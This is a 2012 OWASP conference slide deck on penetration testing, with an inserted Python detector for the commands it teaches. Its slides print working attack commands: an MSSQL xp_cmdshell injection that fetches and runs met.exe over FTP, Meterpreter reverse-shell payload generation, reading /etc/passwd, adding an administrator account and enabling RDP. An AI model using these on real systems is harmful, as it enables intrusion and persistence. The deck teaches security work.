OWASP InfoSec India Conference 2012
August 24th – 25th, 2012
Hotel Crowne Plaza, Gurgaon
The OWASP Foundation
http://www.owasp.org
http://www.owasp.in




Public exploit held private :
Penetration Testing the researcher’s way
Tamaghna Basu
GCIH, OSCP, RHCE, CEH, ECSA
tamaghna.basu@gmail.com




               OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
DISCLAIMER!

 This presentation contains material on the evolution
of a pen tester which is based solely on the
perspective of the speaker and may contradict
the opinions of others.

All the scenarios explained here are fictional even
though they might resemble real situations.

Even though no harm is intended, if it causes any
discomfort to you spiritually and/or physically, the
speaker, organizers, hotel authority, climate control
people and the person sitting next to you will not be
responsible for that.




Setting the context


Why Pentesting?
How do you do it?
 To VA or to PT… That’s the question.




Setting the context

 Terminologies
  Vulnerability
  Exploit
  Payload
  Reverse shell




Basics

Pentesting
  Internal
  External
  Automated -> review the report -> get the
    final report
  Manual -> run a few basic tools -> get the
    report done


Basics…

Pentesting Steps
  Recon and Scanning
  Exploit
  Maintain Access
  Clean up




Scanning
Why?
  Identify the live hosts
  OS fingerprinting
  Service fingerprinting




Scanning
Desi Jugaad
  Ping sweep / shell scripts
 Decent tools (But indecent usage)
  NMAP (behold the power of NSE)
  Others?




Desi Jugaad (Local Hack)

Ping Sweep
Windows

FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply"



 Linux

 #!/bin/bash
 # one ping per host, run in the background; print only the IPs that replied
 for ip in $(seq 1 254); do
   ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 &
 done
 wait   # let the background pings finish before the script exits




Scanning
Problem!
  It is taking too long to scan; I need to go for
    lunch…
  Is it really a Windows box that just looks like a
    Linux box? And which version?




Desi Jugaad
 Nmap
   nmap -sV 192.168.15.201
   nmap -O 192.168.15.201
   nmap -A 192.168.15.201
   nmap -p 1-65535 -sV 192.168.15.201
   nmap -p T:80 192.168.15.200-250
   Zenmap
 Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1-65535
Nmap Scripts




/usr/local/share/nmap/scripts




Nmap Scripts

• Shared files and folders
  • nmap --script=smb-enum-shares 192.168.80.129

• Check for SMB vulnerabilities
  • nmap --script=smb-check-vulns 192.168.80.129

• Scan for machines that use the default MS SQL username and password
  • nmap --script=ms-sql-info 192.168.80.129




Scanning
I have Nessus. Why go through so much
  pain?
I don’t have Nessus. What do I do?




Exploit
 Motive
  To gain access
    Data
    Command execution
    Destroy everything!
 Categories
  Service level
  OS
Exploit

What to exploit?
  FTP?
  HTTP?
  SNMP?
  What else?




Exploit

 FTP
  Server Exploit – Buffer Overflow
  Fuzzing???
  Bruteforce
SNMP
  What to do?


FTP Tips
Windows

echo open 192.168.12.124 > ftp.txt
echo ftp>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo get met2.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt




FTP Tips
Linux

echo quote user ftp > ftp.txt
echo quote pass ftp >> ftp.txt
echo verbose >> ftp.txt
echo binary >> ftp.txt
echo get exploit.c >> ftp.txt
echo bye >> ftp.txt
cat ftp.txt | ftp -n 192.168.12.124


Exploit

 HTTP
  Server Exploit
  Command Execution
  Web Shells
  SQLi




HTTP




SQLi Tips

' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye';exec master..xp_cmdshell 'ftp -s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';--
SQLi Tips

MySQL non-interactive
  mysql --host=127.0.0.1 --user=root --password='password' -e "use mysql; show tables;"
  mysql --host=127.0.0.1 --user=root --password='password' -e "SELECT LOAD_FILE('/etc/passwd') INTO DUMPFILE '/tmp/passwd';"


Exploit

 Metasploit
  Use Exploit
  Set payload
  exploit
 Any other options?
How about writing own exploit (at free time)
  (out of scope)


L33t love story

 Exploit’s love letter to the machine
  PAYLOAD…
Which courier?
  MSF – set payload
  Custom program – msfpayload
    Bad characters
  Executable - msfpayload

Payload Generator
 meterpreter msfpayload
  options:
  ./msfpayload windows/meterpreter/reverse_tcp O

  Create exe:
  ./msfpayload windows/meterpreter/reverse_tcp
  LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe

  Generate shellcode:
  ./msfpayload windows/meterpreter/reverse_tcp
  LHOST=192.168.14.15 LPORT=4321 C



From msf:
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST 192.168.1.40
 set LPORT 80
 show options
 exploit



Exploit

I am in, what to do?
  Secure access?
    Add user
    Open a port
    I like it the reverse way
    meterpreter
  Dude, did you get root/admin access?

Add User
 Windows Shell
  net user hacker hacker123 /add
  net localgroup administrators hacker /add
 Meterpreter
  use incognito
  add_user hacker hacker123
  add_localgroup_user Administrators hacker
 RDP enable
   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
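From the defender's side, the commands on the FTP Tips, SQLi Tips and Add User slides all leave distinctive process-creation events. The following is an added example, not part of the original deck: a small Python detector that flags those command lines in Sysmon Event ID 1 / Windows 4688 style telemetry. The ProcEvent shape, the sample events and the rule labels are all constructed for this illustration.

```python
"""Flag the post-exploitation command lines this deck walks through.

Added example, not part of the original slides: a minimal detector for the
patterns shown on the FTP Tips, SQLi Tips and Add User slides, meant to run
over process-creation telemetry (Sysmon Event ID 1 / Windows 4688 style).
The ProcEvent shape and every sample event below are constructed; the rule
names are my own labels, not vendor signatures.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # e.g. C:\...\sqlservr.exe
    image: str          # the process that was started
    command_line: str   # its full command line


# (label, regex) pairs; each regex targets one technique from the deck.
RULES = [
    # 'ftp -s:<file>' drives the ftp client from a script file (FTP Tips slide)
    ("ftp-scripted-transfer",
     re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I)),
    # echo lines that build that script file: open <ip>, bin/binary, bye
    ("ftp-script-staging",
     re.compile(r"\becho\s+(open\s+[\w.]+|bin|binary|bye)\s*>>?\s*\S+", re.I)),
    # 'net user <name> [<pass>] /add' creates a local account (Add User slide)
    ("local-user-added",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I)),
    # '... localgroup administrators <name> /add' makes that account an admin
    ("local-admin-added",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    # fDenyTSConnections=0 turns Remote Desktop on (RDP enable slide)
    ("rdp-enabled-via-registry",
     re.compile(r"\breg(\.exe)?\s+add\b.*fDenyTSConnections.*\s/d\s+0\b", re.I)),
    # cmd.exe 'FOR /L ... ping' loop from the Desi Jugaad ping sweep
    ("ping-sweep-loop",
     re.compile(r"\bfor\s+/l\s+%\w+\s+in\s+\([^)]*\).*\bping\b", re.I)),
]


def match_rules(ev):
    """Return the labels of every rule the event triggers, in RULES order."""
    hits = [label for label, rx in RULES if rx.search(ev.command_line)]
    # xp_cmdshell never names itself in the child process: it shows up as
    # cmd.exe spawned by sqlservr.exe, so key on the parent/child pair.
    if (ev.parent_image.lower().endswith("sqlservr.exe")
            and ev.image.lower().endswith("cmd.exe")):
        hits.append("mssql-xp_cmdshell-child")
    return hits


def scan(events):
    """Return (index, labels) for every event that triggered at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = match_rules(ev)
        if hits:
            out.append((i, hits))
    return out


# Constructed sample telemetry; 192.0.2.0/24 is a documentation address range.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c echo open 192.0.2.10> ftpmet.txt"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\ftp.exe",
              "ftp -s:ftpmet.txt"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              "net user hacker hacker123 /add"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              "net localgroup administrators hacker /add"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
              r" /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\PING.EXE",
              "ping -n 1 192.0.2.5"),                       # benign: a single ping
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c FOR /L %i in (1,1,255) do @ping -n 1 192.0.2.%i | find "Reply"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              "net user"),                                  # benign: only lists users
]


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)}  <- {SAMPLE_EVENTS[i].command_line}")
```

The parent/child rule is the one to keep even if the regexes are tuned away: a cmd.exe whose parent is sqlservr.exe is the footprint of the xp_cmdshell chain on the SQLi Tips slide regardless of what was typed.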

Privilege Escalation

 Categories
  Service level
  OS
Problem!
  How can I transfer my exploit there?
    Netcat
    FTP

Kernel Exploits
 Linux Kernel <= 2.6.36-rc8 http://www.exploit-db.com/exploits/15285/
 Linux Kernel 2.4/2.6 http://www.exploit-db.com/exploits/9545/
 Linux Kernel 2.6 http://www.exploit-db.com/exploits/8478/
 Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/




Windows Exploits
 Windows Vista, 7, 2008 http://www.exploit-db.com/exploits/15609/
 Windows XP, 2003 http://www.exploit-db.com/exploits/18176/
 Linux + NT priv esc http://www.exploit-db.com/exploits/9301/
 Windows XP SP2, SP3 http://www.exploit-db.com/exploits/9301/




Pivoting…

 Huh?
Why do I need it?
How do I do it?
  nc + port forwarding
  Ssh tunneling




Fuzzing…

 My favorite, but the last thing I prefer to do on
  my own
  Python rocks!
  Basic
  Advanced
    SEH handler
    Egg hunting shellcode

Did I miss anything?

 Questions
 Perspectives
 Comments


                                                 tamaghna.basu@gmail.com
                                                        twitter.com/titanlambda
                                               linkedin.com/in/tamaghnabasu



Thank you




            tamaghna.basu@gmail.com
            twitter.com/titanlambda
            linkedin.com/in/tamaghnabasu




More Related Content

Similar to Public exploit held private : Penetration Testing the researcher’s way

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis   lava kumarThe magic of passive web vulnerability analysis   lava kumar
The magic of passive web vulnerability analysis lava kumar
owaspindia
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...
owaspindia
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
Aleksandr Tarasov
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
Dmitry Iudin
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Anant Shrivastava
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
Jisc
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
Javan Rasokat
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
VISEO
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFD
kilroy440
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module Bundlers
Arun Michael Dsouza
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium tests
Abhijeet Vaikar
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code Everywhere
Matt Ray
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
nmk42194
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity serviceopenstackindia
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
Wim Godden
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
Rosemary Wang
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlow
Databricks
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
Almudena Vivanco
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
Real world Webapp
Real world WebappReal world Webapp
Real world Webapp
Things Lab
 

Similar to Public exploit held private : Penetration Testing the researcher’s way (20)

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis   lava kumarThe magic of passive web vulnerability analysis   lava kumar
The magic of passive web vulnerability analysis lava kumar
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFD
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module Bundlers
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium tests
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code Everywhere
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity service
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlow
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Real world Webapp
Real world WebappReal world Webapp
Real world Webapp
 

Recently uploaded

The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
Jen Stirrup
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
Peter Spielvogel
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
UiPathCommunity
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
UiPathCommunity
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 

Recently uploaded (20)

The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 

Public exploit held private : Penetration Testing the researcher’s way

  • 1. OWASP InfoSec India Conference 2012 August 24th – 25th, 2012 The OWASP Foundation Hotel Crowne Plaza, Gurgaon http://www.owasp.org http://www.owasp.in Public exploit held private : Penetration Testing the researcher’s way Tamaghna Basu GCIH, OSCP, RHCE, CEH, ECSA tamaghna.basu@gmail.com OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
  • 2. DISCLAIMER! This presentation contains materials on the evolution of a pen tester which is solely based on the perspective of the speaker which might contradict with opinions of individuals. All the scenarios explained here are fictional even though they might resemble to realistic situations. Even though no harm intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
  • 3. Setting the context Why Pentesting? How do you do it?  To VA or to PT… That’s the question. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
  • 4. Setting the context  Terminologies  Vulnerability  Exploit  Payload  Reverse shell OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
  • 5. Basics Pentesting  Internal  External  Automated -> review the report -> get the final report  Manual -> run few basic tools -> get the report done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
  • 6. Basics… Pentesting Steps  Recon and Scanning  Exploit  Maintain Access  Clean up OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
  • 7. Scanning Why?  Identify the live hosts  OS fingerprinting  Service fingerprinting OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
  • 8. Scanning Desi Jugaad  Ping sweep / shell scripts  Decent tools (But indecent usage)  NMAP (behold the power of NSE)  Others? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
